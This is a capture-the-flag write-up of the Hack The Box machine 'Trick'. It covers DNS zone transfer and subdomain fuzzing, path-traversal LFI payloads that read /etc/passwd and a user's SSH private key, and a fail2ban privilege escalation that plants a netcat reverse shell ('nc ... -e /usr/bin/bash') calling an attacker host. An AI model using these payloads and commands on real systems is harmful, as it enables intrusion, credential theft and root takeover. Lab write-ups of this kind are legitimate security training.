Contents

🕵️ HTB-Writeup : TRICK

Recon

nmap scan

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ rustscan -a 10.10.11.166 -b 4000 -- -Pn -sV -A  

 ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Rh57OmAndXFukHce0Tr4BL8CWC8yACwWdu8VZcBPGuMUH8VkvzqseeC8MYxt5SPL1aJmAsZSgOUreAJNlYNBBKjMoFwyDdArWhqDThlgBf6aqwqMRo3XWIcbQOBkrisgqcPnRKlwh+vqArsj5OAZaUq8zs7Q3elE6HrDnj779JHCc5eba+DR+Cqk1u4JxfC6mGsaNMAXoaRKsAYlwf4Yjhonl6A6MkWszz7t9q5r2bImuYAC0cvgiHJdgLcr0WJh+lV8YIkPyya1vJFp1gN4Pg7I6CmMaiWSMgSem5aVlKmrLMX10MWhewnyuH2ekMFXUKJ8wv4DgifiAIvd6AGR
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAoXvyMKuWhQvWx52EFXK9ytX/pGmjZptG8Kb+DOgKcGeBgGPKX3ZpryuGR44av0WnKP0gnRLWk7UCbqY3mxXU0=
|   256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGY1WZWn9xuvXhfxFFm82J9eRGNYJ9NnfzECUm0faUXm
25/tcp open  smtp    syn-ack Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
53/tcp open  domain  syn-ack ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    syn-ack nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Webserver is using Bootstrap v5.1.3 to create forms.

Dirbuster scan

1
2
3
4
5
6
7
Dir found: / - 200
Dir found: /assets/ - 403
Dir found: /css/ - 403
Dir found: /assets/img/ - 403
Dir found: /js/ - 403
File found: /js/scripts.js - 200
Dir found: /assets/mp4/ - 403

DNS recon

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
└─$ dig ANY @10.10.11.166 trick.htb

; <<>> DiG 9.18.7-1-Debian <<>> ANY @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30133
;; flags: qr aa rd; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 98c92c8f16cf9ce9863233fd6359458171615eae5c50db63 (good)
;; QUESTION SECTION:
;trick.htb.			IN	ANY

;; ANSWER SECTION:
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1

;; ADDITIONAL SECTION:
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1

;; Query time: 51 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Wed Oct 26 16:34:41 CEST 2022
;; MSG SIZE  rcvd: 209

We find a SOA record with a new domain: root.trick.htb. Then, I tried to do a DNS Zone Transfert.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
└─$ dig axfr @10.10.11.166 trick.htb

; <<>> DiG 9.18.7-1-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 156 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Wed Oct 26 21:28:07 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)

We find a new subdomain preprod-payroll.trick.htb.

Browsing to it, we find a login.php page with an authent form. Re-running dirbuster on the new subdomain and we obtain some php pages.

drawing

Vulnerability

Trying SQLi

I first tried to bypass the login form with a SQLi. I used the Hacktrick’s login bypass wordlist.

1
└─$ ffuf -u http://preprod-payroll.trick.htb/login.php -c -w /usr/share/wordlists/sqli.req  -X POST -d 'username=adminFUZZ&password=admin' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'

But it failed.

Fuzzing again

After some trouble, I just realized that the subdomain preprod-payroll.trick.htb is a pre-production domain for the payroll service, there may be some other subdomains.

1
2
3
4
└─$ ffuf -w /usr/share/wordlists/subdomains-top1mil.txt -H "Host: preprod-FUZZ.trick.htb" -u http://10.10.11.166 -fs 5480

marketing               [Status: 200, Size: 9660, Words: 3007, Lines: 179, Duration: 121ms]
payroll                 [Status: 302, Size: 9546, Words: 1453, Lines: 267, Duration: 122ms]

We find a new subdomain preprod-marketing.trick.htb.

Page browsing on that subdomain is done by the page parameter (http://preprod-marketing.trick.htb/index.php?page=home.html). So it may be vulnerable to LFI.

1
2
└─$ ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-ALL.txt -u "http://preprod-marketing.trick.htb/index.php?page=FUZZ" -fs 0 
....//....//....//....//etc/passwd

I found multiple working payload.

drawing

LFI works !

I first try to get SSH key from users.

1
2
3
4
5
6
7
8
GET /index.php?page=....//....//....//....//home/michael/.ssh/id_rsa HTTP/1.1
[...]

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
[...]
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

The user michael has a SSH key, we can now connect into SSH.

1
2
michael@trick:~$ cat user.txt 
**************************9ff491

And get the user flag :)

Path to the privesc

Checking sudo permissions.

1
2
3
4
5
6
michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

We have the right to restart the fail2ban service. Looking at the conf files, we see that group security can write on the /etc/fail2ban/action.d directory. And hopefully, michael is on the security group.

1
2
michael@trick:/etc/fail2ban$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)

I found an interesting article talking about a fail2ban privesc. So now, we have to find a way to edit the iptables-multiport.conf config file to change the actionban entry. As we have the write permission on the directory, we can edit file using sed.

We can replace the actionban entry with a reverse shell command with sed.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
michael@trick:/etc/fail2ban$ sed -i -E "s\actionban =.*\actionban = /usr/bin/nc 10.10.16.11 4444 -e /usr/bin/bash\g" /etc/fail2ban/action.d/iptables-multiport.conf

michael@trick:/etc/fail2ban$ cat action.d/iptables-multiport.conf
# Option:  actionban
# Notes.:  command executed when banning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values:  CMD
#
actionban = /usr/bin/nc 10.10.16.11 4444 -e /usr/bin/bash

michael@trick:/etc/fail2ban$ sudo /etc/init.d/fail2ban restart

Now, after 5 failed login attempt on the SSH service, the fail2ban service will execute the reverse shell command.

1
2
3
4
5
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.11.166] 39276
id
uid=0(root) gid=0(root) groups=0(root)

We can get the root flag :)